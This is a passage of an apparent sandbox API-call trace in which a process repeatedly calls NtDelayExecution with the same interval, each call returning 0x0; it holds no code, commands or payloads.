(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.318] NtDelayExecution 